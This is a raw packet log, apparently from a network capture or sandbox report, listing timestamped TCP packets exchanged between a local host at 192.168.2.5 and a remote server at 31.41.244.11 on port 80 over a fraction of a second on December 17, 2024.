Dec 17, 2024 06:03:22.242547989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.243485928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.243529081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.243580103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.243618011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.244590998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.244682074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.244721889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.244792938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.245718002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.245830059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.245851040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.245894909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.246861935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.246952057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.247054100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.247242928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.247946978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.248037100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.248070002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.248159885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.249037981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.249130964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.249166965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.249166965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.250158072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.250240088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.250273943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.250323057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.251333952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.251400948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.251429081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.251475096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.252377033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.252525091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.252543926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.252692938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.253493071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.253611088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.253632069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.253670931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.254580975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.254872084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.388323069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.388462067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.388559103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.388891935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.389058113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.389111996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.389978886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.390088081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.390104055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.390434027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.391072989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.391129017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.391201973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.391262054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.392182112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.392273903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.392303944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.392353058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.393333912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.393440962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.393492937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.394447088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.394556999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.394603968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.395576954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.395679951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.395693064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.396006107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.396650076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.396718025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.396728039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.397134066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.397756100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.397860050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.397883892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.397927046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.398860931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.398915052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.398986101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.399044037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.399961948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.400082111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.400146961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.401086092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.401207924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.401309967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.402232885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.402337074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.402348995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.402508020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.403327942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.403440952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.403462887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.403574944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.404408932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.404444933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.404532909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.404622078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.405560017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.405642986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.405693054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.405973911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.406711102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.406822920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.406879902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.407800913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.407938957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.408047915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.408910036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.409006119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.409019947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.409349918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.409993887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.410105944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.410126925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.410267115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.411088943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.411174059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.411206961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.411290884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.412231922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.412307978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.412367105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.412440062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.413328886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.413436890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.413544893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.414424896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.414556980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.414660931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.415571928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.415700912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.415786982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.415786982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.416665077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.416765928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.416773081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.416973114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.417768955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.417825937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.417927980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.418133020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.418926954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.419017076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.419023037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.419071913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.420017004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.420125008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.420388937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.421139002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.421255112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.421360970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.422226906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.422328949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.422339916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.422425032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.423356056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.423439026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.423532009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.423532009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.424485922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.424582005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.424602985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.424721956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.425570011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.425646067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.425699949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.425811052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.426695108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.426764965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.426781893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.426955938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.427810907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.427906990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.427970886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.428910971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.429023027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.429207087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.430064917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.430136919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.430166960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.430210114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.431211948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.431273937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.431359053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.431519032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.432262897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.432368040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.432384014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.432487965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.433408022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.433506966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.433521032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.433727980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.434509039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.434566021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.434607029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.435560942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.435643911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.435678005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.435715914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.435750961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.435750961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.436829090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.436937094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.437108040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.437923908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.438036919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.438045025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.438199997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.439048052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.439112902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.439132929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.439212084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.440149069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.440252066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.440259933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.440303087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.441256046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.441366911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.441389084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.441442966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.442394972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.442500114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.442563057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.443481922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.443594933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.443641901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.444607019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.444658041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.444786072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.445777893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.445857048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.445879936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.447925091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.580646992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.580677032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.580796003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.581094980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.581335068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.581420898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.581454039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.582441092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.582539082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.582549095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.582607985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.583543062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.583681107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.583798885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.584707022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.584777117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.584878922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.585776091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.585824013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.585865021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.586899042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.586949110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.586956978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.587687016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.588001013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.588109016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.588193893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.589122057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.589251995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.589340925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.590238094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.590387106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.590440035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.591330051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.591394901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.591434002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.591926098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.592461109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.592557907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.592600107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.592600107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.593560934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.593606949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.593667030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.593748093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.594680071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.594780922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.594791889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.594888926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.595776081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.595873117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.595899105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.596949100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.597059965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.597064018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.598011017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.598181009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.598259926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.598490000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.599133968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.599201918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.599250078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.600255966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.600346088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.600406885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.601342916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.601399899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.601454020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.602472067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.602571964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.603127956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.603602886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.603673935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.603682041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.603797913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.604700089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.604810953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.605097055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.605819941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.605915070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.606002092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.606920004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.606997967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.607211113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.607937098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.608074903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.608125925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.608129978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.608181953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.609164000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.609272957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.609296083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.609375000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.610321999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.610416889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.610477924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.610477924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.611382008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.611490965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.611510038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.611563921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.612498045 CET	80	49850	31.41.244.11	192.168.2.5
